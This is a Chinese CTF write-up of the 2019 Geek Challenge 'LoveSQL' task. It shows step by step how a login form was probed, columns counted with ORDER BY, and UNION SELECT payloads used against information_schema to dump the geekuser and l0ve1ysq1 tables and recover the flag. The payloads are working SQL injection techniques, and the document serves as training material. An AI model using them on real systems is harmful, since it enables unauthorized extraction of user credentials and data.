[极客大挑战 2019]LoveSQL 1

题目环境:
判断注入类型

是否为数字型注入

admin
1

回显结果

是否为字符型注入

admin
1'

回显结果

判断注入手法类型

使用堆叠注入

采用密码参数进行注入

爆数据库
1'; show database();#

回显结果

这里猜测注入语句某字段被过滤,或者是';'被过滤导致不能堆叠注入

爆字段数
1';order by 4#

回显结果

报错

抛弃堆叠注入

步入正题
1' order by 4#

回显结果

成功,但是不存在第4列

同时验证了猜想不能使用堆叠注入

继续判断列数
1' order by 3#

可知列数只有3列

爆数据库

使用联合查询
1' union select 1,2,database()#

爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

回显结果

爆出两个表

开始爆数据表的字段

按照先后顺序把,先爆第一个

爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#

回显结果

字段:id、username、password

爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#

回显结果

无flag

转手数据表l0ve1ysq1

步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#

回显结果


得出flag:
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}

相关推荐
我去流水了1 分钟前
【独家免费】【亲测】在linux下嵌入式linux的web http服务【Get、Post】,移植mongoose,post上传文件
linux·运维·前端
无籽西瓜a1 分钟前
Linux 文件权限与 chmod 详解
linux·服务器·后端
2501_945424802 分钟前
持续集成/持续部署(CI/CD) for Python
jvm·数据库·python
qq_283720053 分钟前
MySQL技巧(六):忘记密码的7种自救方案与深度解析
数据库·mysql
攻城狮在此4 分钟前
Rufus使用教程:Windows/Linux 系统启动盘制作
linux·服务器·windows
njidf9 分钟前
Python上下文管理器(with语句)的原理与实践
jvm·数据库·python
山川绿水10 分钟前
Buuctf——[GYCTF2020]Ezsqli
web安全·网络安全·ctf
DARLING Zero two♡11 分钟前
CentOS 部署 Teemii:打造专属私人漫画阅读库
linux·运维·centos
工頁光軍14 分钟前
Nginx 核心场景配置示例(负载均衡/反向代理/重定向+扩展场景)
运维·nginx·负载均衡
咸鱼梦想家π20 分钟前
Linux权限
linux·运维·服务器